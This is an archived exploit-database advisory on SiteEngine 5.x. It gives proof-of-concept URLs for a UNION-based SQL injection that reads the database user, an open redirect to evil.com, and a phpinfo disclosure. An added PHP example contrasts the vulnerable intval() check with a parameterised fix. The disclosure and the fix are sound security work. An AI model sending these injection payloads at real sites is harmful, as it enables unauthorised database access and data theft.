SiteEngine 5.x Multiple Remote Vulnerabilities



EDB-ID: 6823
CVE: N/A
OSVDB-ID: N/A
Author: xy7
Published: 2008-10-23
Verified: Verified
Incorrect use of the intval function allows the parameter check to be bypassed, resulting in a SQL injection vulnerability.
-=0x01=- SQL injection Vulnerability
The vulnerable code looks like this:
if ( intval( $id ) )
{
    // intval() is only tested for truth here; the raw $id is what reaches the query
    require_once( $site_engine_root."lib/rss.php" );
    $sql = "SELECT url FROM ".$tablepre."feed WHERE id={$id} AND uploader='{$SESSION['uid']}'";
POC:
http://www.test.com/announcements.php?id=1%bf%27%20and%201=2%20%20UNION%20select%201,2,user(),4,5,6,7,8,9,10,11%20/*
This vulnerability also exists in board.php.
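The intval() pattern above next to one way to correct it, as an added example that is not part of the original advisory or SiteEngine's code. The in-memory SQLite table, its rows and the function names are constructed for illustration, and the pdo_sqlite extension is assumed.

```php
<?php
// Added example: constructed schema and data, not SiteEngine's own code.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE feed (id INTEGER, url TEXT, uploader TEXT)");
$db->exec("INSERT INTO feed VALUES (1, 'http://a.example/rss', 'alice'),
                                   (2, 'http://b.example/rss', 'bob')");

// Pattern from the advisory: intval() is used only as a truth test,
// then the original string is interpolated into the SQL text.
function feed_urls_vulnerable(PDO $db, $id, $uid) {
    if (!intval($id)) {
        return [];
    }
    $sql = "SELECT url FROM feed WHERE id={$id} AND uploader='{$uid}'";
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened form: accept only a plain positive integer, and bind both
// values so neither can become part of the SQL text.
function feed_urls_fixed(PDO $db, $id, $uid) {
    $id = filter_var($id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return [];
    }
    $stmt = $db->prepare("SELECT url FROM feed WHERE id = :id AND uploader = :uid");
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->bindValue(':uid', $uid, PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Constructed input: it begins with a digit, so the intval() test passes
// even though the string is not a number.
$input = "1 OR 1=1";

// 'bob' does not own feed 1, so a correct lookup returns nothing for him.
echo "vulnerable: ";
print_r(feed_urls_vulnerable($db, $input, 'bob'));
echo "fixed, same input: ";
print_r(feed_urls_fixed($db, $input, 'bob'));
echo "fixed, id=2: ";
print_r(feed_urls_fixed($db, "2", 'bob'));
```

The vulnerable function returns rows the uploader filter should have excluded because the appended condition changes the WHERE clause; the hardened function rejects the same input before any query is built.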
-=0x02=- URI Redirection Vulnerability
POC:
http://www.test.com/api.php?action=logout&forward=http://evil.com
-=0x03=- Information Disclosure Vulnerability
POC:
http://www.test.com/misc.php?action=php_info
ForFun~
-=EOF=-
# milw0rm.com [2008-10-23]